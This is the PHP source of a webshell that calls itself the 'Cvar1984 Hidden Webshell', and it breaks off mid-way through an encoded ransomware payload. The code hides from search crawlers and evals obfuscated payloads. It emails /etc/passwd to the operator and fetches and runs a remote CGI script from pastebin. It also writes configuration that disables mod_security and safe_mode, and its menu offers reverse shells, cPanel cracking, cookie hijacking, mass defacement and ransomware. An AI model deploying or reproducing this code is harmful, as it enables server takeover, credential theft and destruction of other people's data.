Shell cvar

1. <?php
2. @session_start();
3. @ini_set('max_execution_time', 0);
4. @ini_set('memory_limit', '999999999M');
5. @set_time_limit(0);
6. @ini_restore("safe_mode_include_dir");
7. @ini_restore("safe_mode_exec_dir");
8. @ini_restore("disable_functions");
9. @ini_restore("allow_url_fopen");
10. @ini_restore("safe_mode");
11. @ignore_user_abort(FALSE);
12. @ini_set('zlib.output_compression', 'Off');
13. eval(gzuncompress(base64_decode("eJxTKS1OLcpLzE21VSpOrEzMS1ey5uVSKUgsLi7PL0pBEUzNTczMsVXKLyjITM5MzKmockgHiegl5+cqWSsAAJh+GMo")));
14. function Zip($source, $destination) {
15. if(!extension_loaded('zip') || !file_exists($source)) {
16. return false;
17. }
18. $zip = new ZipArchive();
19. if(!$zip->open($destination, ZIPARCHIVE::CREATE)) {
20. return false;
21. }
22. $source = str_replace('\\', '/', realpath($source));
23. if(is_dir($source) == true) {
24. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
25. foreach($files as $file) {
26. $file = str_replace('\\', '/', realpath($file));
27. if(is_dir($file) == true) {
28. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
29. } else if(is_file($file) == true) {
30. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
31. }
32. }
33. } else if(is_file($source) == true) {
34. $zip->addFromString(basename($source), file_get_contents($source));
35. }
36. return $zip->close();
37. }
38. if(isset($_GET['zip'])) {
39. $src = $_GET['zip'];
40. $dst = getcwd() . "/" . basename($_GET['zip']) . ".zip";
41. if(Zip($src, $dst) != false) {
42. $filez = file_get_contents($dst);
43. header("Content-type: application/octet-stream");
44. header("Content-length: " . strlen($filez));
45. header("Content-disposition: attachment;
46. filename=\"" . basename($dst) . "\";");
47. echo $filez;
48. }
49. exit;
50. }
51. @error_reporting(4);
52. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
53. $userAgents = array(
54. "Google",
55. "Slurp",
56. "MSNBot",
57. "ia_archiver",
58. "Yandex",
59. "Rambler"
60. );
61. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
62. header('HTTP/1.0 404 Not Found');
63. exit;
64. }
65. }
66. echo "<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW\" />";
67. echo "
68. <style>
69. .kedip {
70. -webkit-animation-name: blinker;
71. -webkit-animation-duration:3s;
72. -webkit-animation-timing-function: linear;
73. -webkit-animation-iteration-count: infinite;
74.  
75. -moz-animation-name: blinker;
76. -moz-animation-duration:2s;
77. -moz-animation-timing-function: linear;
78. -moz-animation-iteration-count: infinite;
79.  
80. animation-name: blinker;
81. animation-duration:3s;
82. animation-timing-function: linear;
83. animation-iteration-count: infinite;
84. }
85. @-moz-keyframes blinker {
86. 0% { opacity: 1.0; }
87. 50% { opacity: 0.0; }
88. 100% { opacity: 1.0; }
89. }
90. @-webkit-keyframes blinker {
91. 0% { opacity: 1.0; }
92. 50% { opacity: 0.0; }
93. 100% { opacity: 1.0; }
94. }
95. @keyframes blinker {
96. 0% { opacity: 1.0; }
97. 50% { opacity: 0.0; }
98. 100% { opacity: 1.0; }
99. }
100. input {
101. font-size:11px;
102. background:#191919;
103. color:yellow;
104. margin:0 4px;
105. border:1px solid #008080;
106. }
107. .hidden {
108. background:white;
109. border:1px solid white;
110. color:white;
111. }
112. td {
113. border-radius:5px;
114. font-size:11px;
115. }
116. .header {
117. size:25px;
118. color:yellow;
119. }
120. .go {
121. height:50px;
122. width:50px;
123. float:left;
124. margin-right:10px;
125. display:none;
126. background-color:#090;
127. }
128. .input_big {
129. width:75px;
130. height:30px;
131. background:#191919;
132. color:yellow;
133. margin:0 4px;
134. border:1px solid #222222;
135. font-size:17px;
136. }
137. hr { border:1px solid #222222; }
138. #meunlist {
139. width:auto;
140. height:auto;
141. font-size:12px;
142. font-weight:bold;
143. }
144. #meunlist ul {
145. padding-top:5px;
146. padding-right:5px;
147. padding-bottom:7px;
148. padding-left:2px;
149. text-align:center;
150. list-style-type:none;
151. margin:0px;
152. }
153. #meunlist li {
154. margin:0px;
155. padding:0px;
156. display:inline;
157. }
158. #meunlist a {
159. font-size:14px;
160. text-decoration:none;
161. font-weight:bold;
162. color:yellow;
163. clear:both;
164. width:100px;
165. margin-right:-6px;
166. padding-top:3px;
167. padding-right:15px;
168. padding-bottom:3px;
169. padding-left:15px;
170. }
171. #meunlist a:hover { background: #333; color:#008080; }
172. .menubar {
173. -moz-border-radius:10px;
174. border-radius:10px;
175. border:1px solid #008080;
176. padding:4px 8px;
177. line-height:16px;
178. background:#111111;
179. color:#aaa;
180. margin:0 0 8px 0;
181. }
182. .menu { font-size:25px; color:#008080 }
183. .textarea_edit,textarea{
184. background-color:#111111;
185. border:1px groove #333;
186. color:lime;
187. width:383px;
188. height:400px;
189. font-size:15px;
190. text-decoration:none;
191. border:1px dashed #333;
192. }
193. .input_butt {
194. font-size:11px;
195. background:#191919;
196. color:#4C83AF;
197. margin:0 4px;
198. border:1px solid #222222;
199. }
200. #result {
201. -moz-border-radius:10px;
202. border-radius:10px;
203. border:1px solid #008080;
204. padding:4px 8px;
205. line-height:16px;
206. background:#111111;
207. color:#aaa; margin:0 0 8px 0;
208. min-height:100px;
209. }
210. .table {
211. width:100%;
212. padding:4px 0;
213. color:#888;
214. font-size:15px;
215. }
216. .table a {
217. text-decoration:none;
218. color:yellow;
219. font-size:15px;
220. }
221. .table a:hover {
222. text-decoration:underline;
223. }
224. .table td {
225. border-bottom:1px solid #222222;
226. padding:0 8px;
227. line-height:24px;
228. vertical-align:top;
229. }
230. .table th {
231. padding:3px 8px;
232. font-weight:normal;
233. background:#222222;
234. color:#555; }
235. .table tr:hover { background:#181818; }
236. .tbl{
237. width:100%;
238. padding:4px 0;
239. color:#888;
240. font-size:15px;
241. text-align:center;
242. }
243. .tbl a {
244. text-decoration:none;
245. color:yellow;
246. font-size:15px;
247. vertical-align:middle;
248. }
249. .tbl a:hover { text-decoration:underline; }
250. .tbl td {
251. border-bottom:1px solid #222222;
252. padding:0 8px;
253. line-height:24px;
254. vertical-align:middle;
255. width:300px;
256. }
257. .tbl th {
258. padding:3px 8px;
259. font-weight:normal;
260. background:#222222;
261. color:#555;
262. vertical-align:middle;
263. }
264. .tbl td:hover { background:#181818; }
265. #alert { position: relative; }
266. #alert:hover:after { background: hsla(0,0%,0%,.8);
267. border-radius:3px;
268. color:#f6f6f6;
269. content:'Close';
270. font:bold 12px/30px
271. sans-serif;
272. height:30px;
273. left:50%;
274. margin-left:-60px;position:absolute;
275. text-align:center;
276. top:50px;
277. width:120px;
278. }
279. #alert:hover:before {
280. border-bottom:10px solid hsla(0,0%,0%,.8);
281. border-left:10px solid transparent;
282. border-right:10px solid transparent;
283. content:'';
284. height: 0;
285. left:50%;
286. margin-left:-10px;
287. position:absolute;
288. top:40px;
289. width:0;
290. }
291. #alert:target { display: none; }
292. .alert_red {
293. animation:alert 1s ease forwards;background-color:#c4453c;
294. background-image:linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;
295. box-shadow:0 5px 0 hsla(0,0%,0%,.1);
296. color:#f6f6f6;
297. display:block;
298. font:bold 16px/40px sans-serif;
299. height:40px;
300. position:absolute;
301. text-align:center;
302. text-decoration:none;
303. top:-45px;
304. width:100%;
305. }
306. .alert_yellow {
307. animation:alert 1s ease forwards;
308. background-color:#43CD80;
309. background-image:linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;
310. box-shadow:0 5px 0 hsla(0,0%,0%,.1);
311. color:#f6f6f6;display:block;
312. font:bold 16px/40px sans-serif;height:40px;
313. position:absolute;text-align:center;
314. text-decoration:none;
315. top:-45px;
316. width:100%;
317. }
318. @keyframes alert {0% { opacity: 0; }50% { opacity: 1; }100% { top: 0; }}
319. #divAlert { background-color:yellow; color:red;}
320. </style>
321. <div id=divAlert></div>";
322. if($_COOKIE["user"] != $username && $_COOKIE["pass"] != md5($password)) {
323. if($_POST["usrname"] == $username && $_POST["passwrd"] == $password) {
324. print '<script>document.cookie="user=' . $_POST["usrname"] . ';";document.cookie="pass=' . md5($_POST["passwrd"]) . ';";</script>';
325. if($email != "") {
326. mail_alert();
327. }
328. } else {
329. if($_POST['usrname']) {
330. print '<script>alert("Wrong Username or password");</script>';
331. }
332. echo '
333. <h1>Permission Denied</h1>
334. <p>You don t have permission to access the this page.</p>
335. <form method="post">
336.  
337. <input class="hidden" type="password" size="30" name="passwrd" value="" onfocus="if (this.value == \'password\')
338. this.value = \'\';">
339. <input type="hidden" name="action" value="login">
340. <input type="hidden" name="hide" value="">
341. <input type="hidden" size="30" name="usrname" value="Cvar1984" onfocus="if (this.value == \'username\'){this.value = \'\';}">
342. </form>';
343. exit;
344. }
345. }
346. $color_g = "yellow";
347. $color_b = "4C83AF";
348. $color_bg = "#111111";
349. $color_hr = "#222";
350. $color_wri = "yellow";
351. $color_rea = "yellow";
352. $color_non = "red";
353. $path = $_GET['path'];
354. $sep = "/";
355. $date = date('d-M-Y H:i');
356. if(strtolower(substr(PHP_OS, 0, 3)) == "win") {
357. $os = "win";
358. $sep = "\\";
359. $ox = "Windows";
360. } else {
361. $os = "nix";
362. $ox = "Linux";
363. }
364. $self = $_SERVER['PHP_SELF'];
365. $srvr_sof = $_SERVER['SERVER_SOFTWARE'];
366. $your_ip = $_SERVER['REMOTE_ADDR'];
367. $srvr_ip = $_SERVER['SERVER_ADDR'];
368. $admin = $_SERVER['SERVER_ADMIN'];
369. $s_php_ini = "safe_mode=OFF
370. disable_functions=NONE";
371. $ini_php = "
372. <?php
373. echo ini_get(\"safe_mode\");
374. echo ini_get(\"open_basedir\");
375. include(\$_GET[\"file\"]);
376. ini_restore(\"safe_mode\");
377. ini_restore(\"open_basedir\");
378. echo ini_get(\"safe_mode\");
379. echo ini_get(\"open_basedir\");
380. include(\$_GET[\"ss\"]);
381. ?>";
382. $s_htaccess = "
383. <IfModule mod_security.c>
384. Sec------Engine Off
385. Sec------ScanPOST Off
386. </IfModule>";
387. $s_htaccess_pl = "
388. Options FollowSymLinks MultiViews Indexes ExecCGI
389. AddType application/x-httpd-cgi .sh
390. AddHandler cgi-script .pl";
391. $sym_htaccess = "Options all
392. DirectoryIndex Sux.html
393. AddType text/plain .php
394. AddHandler server-parsed .php
395. AddType text/plain .html
396. Require None
397. Satisfy Any";
398. $sym_php_ini = "
399. safe_mode=OFF
400. disable_functions=NONE";
401. $forbid_dir = "Options -Indexes";
402. $cookie_highjacker = "rVVdc5pAFH13xv9wh3Eipq22M3miasaJGGmNWsS2mU6HQVyEFlnCLkk7If+9d8EPCKFtpuVB2d1z7z177gf1Wvc8dMN6rXP6av/AJQlIZHGyBouBBaEVcaAOaNOhPninGWNYjNXJBMKIfiM2h53Zaadec+LA5h4N0AXX5nKrXruv1wAfzwF5QzgJbmVpbBhz82KiqVPD1OZSC05OgPHIthixt2El7CVIcfA9oHeB1GplXnfOxdPwQuhBle3bDPiQ/RGfkTKjz+Zopn8a6EN1KN5+z6sEfja7koc/cNTVq5mhmoPhsJpaAfMcRgXDCiIeY4TLDXOh6h9V/UszZ9P8mjKqOHtEtgL1N3QrTMuEK+wPEYoWEeFxFMiIEXd/yJWxTzdDi1u5QkbQhG56kk0Dx9vE2CaIY23+g++dNmxKv3ukQPfDUtWvzYWha9PLA99GRDYe4yQyNz5dWT5DE3lFqd8CL/BMzI3cPEJSRHOfHJGQkn2rmNWCSHvDNJ0ZbNejeHDgszVDis3+hNLzmW4cmccMo1obEhSxaWEvcWUOLrH1cje9YdzcEu7SdcHgSjXGs2Feka3pUvYkg/FskfdIHBKRqBxeV0eqrh6rorHGSdYTPyBLPqwXYpSN4BpcxVMYDA713sBk9xwakkCWsixLWJPWC+mokFA9RNXNrcVtV5Y6K5dvVx0PgZlFC5IESgi/ACkXtxPGnMkiPgbU5kqanwSE5EouKwkICZScSgkMRA6UQkISyFRVirIngMooR+ESGA4M9R4UeMg0wp2L2ey9pirHGu6uov5TA+F/XuGf7pBeQqm+QBA8pu/YPmUkpbrr9kOT45LYLgWpXuuKtPW7LrHWfVxxj/ukf/b6DKaUw4jGwbrbyTbxtJPCuiu6/imW7pt+DoUr3Av7hktw0NzEhIkP61KfgNQuFDnOiIVhLnUNJ2Zbgjv89gboxhFuAGcRdz0GKNEtidrdTpgGTkOKwXOOy18=";
403. $bind_perl = "rZJdb5swFIavi8R/OHXTFSSmZJu2i0abxAjtWApEQLtNVYUoOK1VgimmmqIq/30+dpKmmna1+Aq/7/Fzvjg6HD6JbnjLmmFLuxre/jYN0zjax5EY+P+jMee0oV3R0woKAQW0RdcDn0MQTRL3e5B9g5A1DNJ7WtfwdQlKm84+fhrBdRaf3Wwwe6lmP7MxjSdBIeXlA+3H+uLxZs7u5GXAhcr2GQZae+aiKRZ0hV7Lu/5AOm5yfnU9ulFSx3sutTvaq8/bJUZbJ33ZntgYUC4qaZO6rcgYUw/EUvR0gZpavbjXOptbmJs+AgnTH6z58J7YpvFsGgfrF7IkcuzFYTrzvWMYTvHZShFHWK3MozhCtWWlfnLlJw7MzvIg8jMH0tib5mmW+G7ogC7bBt5BxSgQ/eh0cIhQQXu88/aFksYXOQI0KE/8y9R3JxPptEX5YJGaOPDO3uFtEaegobLVaotDr6iqLmeNpYbqyN8Jebkb/drB4KMNoGZyCM1ORaH704uj6CVaR2ziTWPOO2ssW8VMckJFWVLZkncR+BG2oUD2GMqa4w+g5PXEeYuZskkQOUC+vNEewXVurfgy+6fnJ8lfnt6htd6lklRineb1XbJfCxKIwuoP";
404. if($safemode == "On") {
405. echo "<div id='alert'><a class=\"alert_yellow\"
406. href=\"#alert\">Safe Mode : <font
407. color=red>ON</font></a></div>";
408. } else {
409. echo "<div id='alert'><a class=\"alert_yellow\"
410. href=\"#alert\">Safe Mode : <font
411. color=lime>OFF</font></a></div>";
412. }
413. echo "<script
414. src=\"http://code.jquery.com/jquery-latest.js\"></script><script>$(\"#alert\").delay(2000).fadeOut(300);</script>";
415. echo "<title>Cvar1984 Hidden Webshell</title>
416. <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
417. <body bgcolor=black>
418. <div id=result>
419. <table>
420. <tbody>
421. <tr>
422. <td style='border-right:1px solid #104E8B;' width=\"300px;\">
423. <div style='text-align:center;'>
424. <a href='?' style='text-decoration:none;'>
425. <pre onkeydown=return false; onmousedown=return false; class=kedip style='color:lime;'>
426. _________ ____ ________ ______ _____
427. \_ ___ \___ _______ ______/_ / __ \/ __ \ / | |
428. / \ \/\ \/ /\__ \\_ __ \ \____ /> < / | |_
429. \ \____\ / / __ \| | \/ | / // -- \/ ^ /
430. \______ / \_/ (____ /__| |___| /____/ \______ /\____ |
431. \/ \/ \/ |__|
432. </pre>
433. </a><font
434. color=yellow>=========== BlackHole Security ===========</font>
435. </div></td>
436. <td>
437. <div class=\"header\">OS</font>
438. <font color=\"#666\" >:</font>
439. " . $ox . " </font> <font color=\"#666\" >|</font>
440. " . php_uname() . "<br>
441. Your IP : <font color=red>" . $your_ip . "</font>
442. <font color=\"#666\" >|</font>
443. Server IP : <font color=red>" . $srvr_ip . "</font>
444. <font color=\"#666\" > | </font>
445. Admin <font color=\"#666\" > : </font>
446. <font color=red> {$admin} </font><br>MySQL <font color=\"#666\" > : </font>";
447. echo mysqlx();
448. echo "<font color=\"#666\" > |
449. </font> Oracle <font color=\"#666\" > :
450. </font>";
451. echo oraclesx();
452. echo "<font color=\"#666\" > |
453. </font> MSSQL <font color=\"#666\" > :
454. </font>";
455. echo mssqlx();
456. echo "<font color=\"#666\" > |
457. </font> PostGreySQL <font color=\"#666\" > :
458. </font>";
459. echo postgreyx();
460. echo "<br />cURL <font color=\"#666\"
461. > : </font>";
462. echo curlx();
463. echo "<font color=\"#666\" > |
464. </font>Total Space<font color=\"#666\" > :
465. </font>";
466. echo disc_size();
467. echo "<font color=\"#666\" > |
468. </font>Free Space<font color=\"#666\" > :
469. </font>";
470. echo freesize();
471. echo "<br />Software<font
472. color=\"#666\" > : </font><font
473. color=red>{$srvr_sof}</font>
474. <font color=\"#666\">
475. | </font> PHP<font color=\"#666\" > :
476. </font><a style='color:red; text-decoration:none;' target=_blank href=?phpinfo>" . phpversion() . "</a>
477. <br />Disabled Functions<font
478. color=\"#666\"
479. > : </font></font><font color=red>";
480. echo disabled_functns() . "</font><br />";
481. if($os == 'win') {
482. echo "Drives <font color=\"#666\" > : </font>";
483. echo drivesx();
484. } else {
485. echo "r00t Exploit
486. <font color=\"#666\" > : </font>
487. <font color=red>";
488. echo r00t_exploit() . "</font>";
489. }
490. echo "
491. </div>
492. </td>
493. </tr>
494. </tbody>
495. </table></div>";
496. echo "
497. <div class='menubar'>
498. <div id=\"meunlist\" align=center>
499. <ul>
500. <li>[<a href=\"?ngindex\">Priv Index</a>]</li>
501. <li>[<a href=\"?cgi\">CGI Telnet</a>]</li>
502. <li>[<a href=\"?rs\">Reverse Shell</a>]</li>
503. <li>[<a href=\"?jembud2\">b374k 2</a>]</li>
504. <li>[<a href=\"?idx\">IndoXploit</a>]</li>
505. </ul><ul>
506. <li>[<a href=\"?musik\">Sound Cloud</a>]</li>
507. <li>[<a href=\"?rctm\">Realtime DDOS Map</a>]</li>
508. <li>[<a href=\"?encodefile\">Encode/Decode</a>]</li>
509. <li>[<a href=\"?path={$path}&amp;safe_mod\">Safe Mode Fucker</a>]</li>
510. <li>[<a href=\"?path={$path}&amp;forbd_dir\">Dir Listing Forbidden</a>]</li>
511. </ul><ul>
512. <li>[<a href=\"?massmailer\">Mass Mailer</a>]</li>
513. <li>[<a href=\"?cpanel_crack\">cPanel Crack</a>]</li>
514. <li>[<a href=\"?sh311_scanner\">Backdoor Scan</a>]</li>
515. <li>[<a href=\"?server_exploit_details\">Exploit Details</a>]</li>
516. <li>[<a href=\"?remote_server_scan\">Remote Server Scan</a>]</li>
517. </ul><ul>
518. <li>[<a href=\"?remotefiledown\">Remote File Downloader</a>]</li>
519. <li>[<a href=\"?hexenc\">Hex Encode/Decode</a>]</li>
520. <li>[<a href=\"?ftp_anon_scan\">FTP Anonymous Access Scaner</a>]</li>
521. <li>[<a href=\"?path={$path}&amp;mass_xploit\">Mass Deface</a>]</li>
522. <li>[<a href=\"?config_grab\">Config Grabber</a>]</li>
523. </ul><ul>
524. <li>[<a href=\"?symlink\">SymLink</a>]</li>
525. <li>[<a href=\"?cookiejack\">Cookie Hijack</a>]</li>
526. <li>[<a href=\"?sshman\">Secure Shell</a>]</li>
527. <li>[<a href=\"?path={$path}&c0de_inject\">Mass Overwrite</a>]</li>
528. <li>[<a href=\"?ftpman\">FTP Manager</a>]</li>
529. </ul><ul>
530. <li>[<a href=\"?ganteng\">Ransomeware</a>]</li>
531. <li>[<a href=\"?logger\">Check Steganologer</a>]</li>
532. <li>[<a href=\"?adminer\">Adminer</a>]</li>
533. <li>[<a href=\"?phpinfo\">PHP Info</a>]</li>
534. <li>[<li class=kedip><a href=\"?killme\"><font color='#008080'>Suicide</font></a></li>]</li>
535. </ul>
536. </div>
537. </div>";
538. function alert($alert_txt) {
539. echo "<div id=divAlert>" . $alert_txt . "</div>";
540. echo "<script>alert('" . $alert_txt . "');window.location.href='?';</script>";
541. }
542. function disabled_functns() {
543. if(!@ini_get('disable_functions')) {
544. echo "None";
545. } else {
546. echo @ini_get('disable_functions');
547. }
548. }
549. function drivesx() {
550. foreach(range('A', 'Z') as $drive) {
551. if(is_dir($drive . ':\\')) {
552. echo "<a> [<a style='color:aqua; text-decoration:none;' href='?path=" . $drive . ":\\'> " . $drive . " </a>] </a>";
553. }
554. }
555. }
556. function mail_alert() {
557. global $email;
558. $passwd = file_get_contents('/etc/passwd');
559. $shell_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
560. $subject = "Logs";
561. $from = "From:Cvar1984";
562. $content_mail = "URL : $shell_path\nIP : " . $_SERVER['REMOTE_ADDR'] . "\n**********\n$passwd\n**********\nBy Cvar1984";
563. mail($email, $subject, $content_mail, $from);
564. }
565. function filesizex($size) {
566. if($size >= 1073741824)
567. $size = round(($size / 1073741824), 2) . " GB";
568. elseif($size >= 1048576)
569. $size = round(($size / 1048576), 2) . " MB";
570. elseif($size >= 1024)
571. $size = round(($size / 1024), 2) . " KB";
572. else
573. $size .= " B";
574. return $size;
575. }
576. function disc_size() {
577. echo filesizex(disk_total_space("/"));
578. }
579. function freesize() {
580. echo filesizex(disk_free_space("/"));
581. }
582. function file_perm($filz) {
583. if($m = fileperms($filz)) {
584. $p = '';
585. $p .= ($m & 00400) ? 'r' : '-';
586. $p .= ($m & 00200) ? 'w' : '-';
587. $p .= ($m & 00100) ? 'x' : '-';
588. $p .= ($m & 00040) ? 'r' : '-';
589. $p .= ($m & 00020) ? 'w' : '-';
590. $p .= ($m & 00010) ? 'x' : '-';
591. $p .= ($m & 00004) ? 'r' : '-';
592. $p .= ($m & 00002) ? 'w' : '-';
593. $p .= ($m & 00001) ? 'x' : '-';
594. return $p;
595. }
596. }
597. function mysqlx() {
598. if(function_exists('mysql_connect')) {
599. echo "<font color='aqua'>Enabled</font>";
600. } else {
601. echo "<font color='#008080'>Disabled</font>";
602. }
603. }
604. function oraclesx() {
605. if(function_exists('oci_connect')) {
606. echo "<font color='aqua'>Enabled</font>";
607. } else {
608. echo "<font color='#008080'>Disabled</font>";
609. }
610. }
611. function mssqlx() {
612. if(function_exists('mssql_connect')) {
613. echo "<font color='aqua'>Enabled</font>";
614. } else {
615. echo "<font color='#008080'>Disabled</font>";
616. }
617. }
618. function postgreyx() {
619. if(function_exists('pg_connect')) {
620. echo "<font color='aqua'>Enabled</font>";
621. } else {
622. echo "<font color='#008080'>Disabled</font>";
623. }
624. }
625. function strip($filx) {
626. if(!get_magic_quotes_gpc())
627. return trim(urldecode($filx));
628. return trim(urldecode(stripslashes($filx)));
629. }
630. function curlx() {
631. if(function_exists('curl_version')) {
632. echo "<font color='aqua'>Enabled</font>";
633. } else {
634. echo "<font color='#008080'>Disabled</font>";
635. }
636. }
637. function filesize_x($filex) {
638. $f_size = filesizex(filesize($filex));
639. return $f_size;
640. }
641. function rename_ui() {
642. $rf_path = $_GET['rename'];
643. echo "<div id=result>
644. <center><h2>Rename</h2><hr><p><br><br>
645. <form method='GET'><input type=hidden name='old_name' size='40' value=" . $rf_path . ">New Name : <input name='new_name' size='40' value=" . basename($rf_path) . ">
646. <input type='submit' value='O'></form></p><br><br><hr><br><br></center></div>";
647. }
648. function cgi() {
649. if(!file_exists('.config')) {
650. mkdir('.config', 0755);
651. }
652. $file_cgi = ".config/cgi.izo";
653. $isi_htcgi = "
654. AddHandler cgi-script .izo
655. Options -Indexes";
656. $htcgi = fopen(".config/.htaccess", "w+");
657. $cgi_script = file_get_contents("https://pastebin.com/raw/MUD0EPjb");
658. $cgi = fopen($file_cgi, "w+");
659. fwrite($cgi, $cgi_script);
660. fwrite($htcgi, $isi_htcgi);
661. chmod($file_cgi, 0755);
662. echo "<iframe src='.config/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
663. }
664. function rctm() {
665. echo "<iframe width='100%' height='100%' src='https://threatmap.fortiguard.com' frameborder='0'>";
666. }
667. function soundcloud() {
668. echo "<iframe width='100%' height='100%' scrolling='no' frameborder='no' src='https://w.soundcloud.com/player/?url=https://api.soundcloud.com/playlists/355874911&amp;color=#00cc11&amp;auto_play=true&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false&amp;show_teaser=true&amp;visual=true'></iframe>";
669. }
670. function gantengware() {
671. echo "
672. <style type='text/css'>
673. body {
674. background: #1A1C1F;
675. color: #e2e2e2;
676. }
677. .inpute{
678. border-style: dotted;
679. border-color: #379600;
680. background-color: transparent;
681. color: white;
682. text-align: center;
683. }
684. .selecte{
685. border-style: dotted;
686. border-color: green;
687. background-color: transparent;
688. color: green;
689. }
690. .submite{
691. border-style: dotted;
692. border-color: #4CAF50;
693. background-color: transparent;
694. color: white;
695. }
696. .result{
697. text-align: left;
698. }
699. </style>
700. <link rel='stylesheet' type='text/css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css'>
701. </head>
702. <body>
703. <div class='result'>";
704. error_reporting(0);
705. set_time_limit(0);
706. ini_set('memory_limit', '-1');
707. class deRanSomeware {
708. public function shcpackInstall() {
709. if(!file_exists(".htabak")) {
710. rename(".htaccess", ".htabak");
711. if(fwrite(fopen('.htaccess', 'w+'), "\rDirectoryIndex index.php\r\nErrorDocument 404 /index.php")) {
712. echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> .htaccess (Default Page)<br>';
713. }
714. if(file_put_contents("index.php", gzinflate(base64_decode("7Vttc9s2Ev5cz/g/MOhVES2aFPXiF0qw6zi5aS5Nmrm417tzfD6IBCVEFKmAkGXV9v32WwCkRMmSorT2zM3VmZYAFovdxWL3AaCB2z0xiI62t75p9ygJZOWbtmAiokc/EL9PA+PFxDi9Itw9PGi0Hd2jmCIW940epyFGPSGGnuOESSxSu5sk3YiSIUttPxk4fpoeh2TAogn+iXeY4EmMDE4jjFIxiWjao1QgQ0yGFCNBr4UcgAwHdCgtqc/ZUByRiHJRRq9jZvyTDEhsnNF+nERJl1kf4xejPlA0/QURI/tj/DH+C4m70H5PeUx6xlsaT0hEelPGj/GHvP0j9L9kAVN1Fnf7IzlSCwGi8YaM1PgRH/WMk5j0jTfUZ5HxcyxGfdnziQTMeEnHJCUf47ckG3ISSAXGTxwMMf7RNV4kQdJDZqvtZHPS85NOWJw+dH3rgzMJiyk3bra3DGPMAtHzDvevxi3ZHBDeZbFXuxobZCQSoN1tb0n/K2ZZ2VVOjyZe7nU1TqrYJRHrxp5PY0G5okZUQHU3HRIf5u+5w2tF9sHB3Bv3mKCq7eycckoENZIryiMy3HEktWBOVUsDq3d7lHV7IqM4OycxGxDBkng2ZndMO30G1uRdntGNmPB7rlGzm6nB4pDFuWr5f/5vgwF3MnqkF7xY9Hb9HouCcs3UntSzMr7d2w/rAWmtNaW2xJSVZtxnXmZGfcGM0N0L98L1ZtS/xoz7zGCGs/OGTkJOBjSVK7C99X2urJ/Tp85U5lW/0+XMKgGBnIYJH3hGnMTzRkBgLe1NZESJiWe4inAnP/vrJKd9Oi7vVu1mQLuWAZVDqJirda3ln2qv2vvNmQHu482ttnZyv0t0fa3Vyg9V+yB3g7uB21awr/BavfloU2vWHk/0Wqt19LjKC1W7tkmoLWNe4bHmI+bQ43ls/8seq9oN5YXNguw+7wp/HTyev9zqY8lWEP/9E4g+gegTiD6B6BOI/g4QXXUirT0KmEL0Fdy2FnJUNYKLT3m3NryGXK8Pr9cs2Tr2gvpHBNP5uT00ns5LXw+pBV80lS9qm7ruHvty1z00os5P7qFBdUH6Wtvv+cL9Ote5X3LdQ0PrQkY9quvWA+y9DNz7uoTd+5LrHhpl5yf34EBbFL/8wPqEsU8Yu9J1Txj7hLFPGPt1GDsYrDnR1v930FYtxqZYu8j8x0Valf6b4uwi8x8XZZUnNsXYReY/LsKqvNsUXxeZ/x/RdckJ9glTnzD1CVM3ctsTpj5h6jJM/eabtqPeo6jnQE7+HqjdSYKJ0emqFwsYdSLi95GRxPKFCr0WAxqPMOJUjHhshCRKaUv2Aj4HyThe0jNIRild0Rdw0k0F4WK+T3alNKK+WNapX9IwtR3ohzIYVZGhn6CoaurzJIpY3MVoQlNkKNZOwgMKE4oTZJAoSsYYybc0w4hMYAT39bum1HOcsZ0mozjwo2QUqEdNkody53jEI6yYvqufOA4ZskVGWAK/nzqNar3hNg6abklquJTDseAjWuqxgF5yKoMswGo2pbSXjC9hLPhVpEUaeI3rUarJ6TBJpxxXLB2RCGcOaTvaG9oz+qWPqsNi8unjqt/WCNiVwQKMpg+UtP/lCgy6834byO4r0h3FPiweZ3bIIpraY3D8kNNUPxCrVd2GUz1woqSb2MO4iwz1yAyjt3r07DHYgiWLLfnQBiLCh6Gzl2Yp+xXa+2jpazY54mgDyRvraaKjsx5LjffgGON1avwCEU15OIqKutoOuFCvjFNYmuypW/Et2CdyRTRV+hjMNtI4GQ/INa5XZ22dlzEdGyeck0kZqRdbyIJQl1ENFU4D+JLPI4LM2TilqDDshDMSGe8I52rQGYPDFZSnyYD5xgeAEuPth+J4/WoMIxtlNBb30yGFQK7ae3PmKucUTYbAUDS3QIPs/BVQCrszUsG6TK9+aNZJhEgGRQqXqa4JAuzmusoulZRMyfXl4KoosaXJPg/SJeQoFFzCx/2eDvgHUpHFYQIDyRXrEpFwW6bnSRfW08iU0yYOEn8k89gGfCmVpq0uFa8iKqsvJq+DUulZUaQ9IHCcLTs/DSknTjbvON3Dq4cX1Wj+RA7Ga8Qaxtxkkj4Ge29vQc/trRq8vRVC2sqHZQZsIwHgEelTXoZ6l5rGjXqSJzvwWyJ6dhglSda5owh6TNk09aaT4bWk6qeKuWz5Rk0uUlk/i2OhUQZDjNtbPYXssVxx2Q1sTOcrdybbjxjUf6A6BIxiRKzg/UXuEcAq91UKgKnUwtSXa4PIhN3KZjHA0SotRZ6i9DySZbQr7+BCSuwWUgF4YaeGyeNqi7VzrharVPL3ghCm5+wCdFVbxtJ/2eafBa7mnVuLHbfZWuSWSZGJtat1ozI/wnH1A05pDnCtCsEySlGFmQVOW50jbAl6f9aPf3PEOS9GU060Ixp3Rc+8mBMhEWKR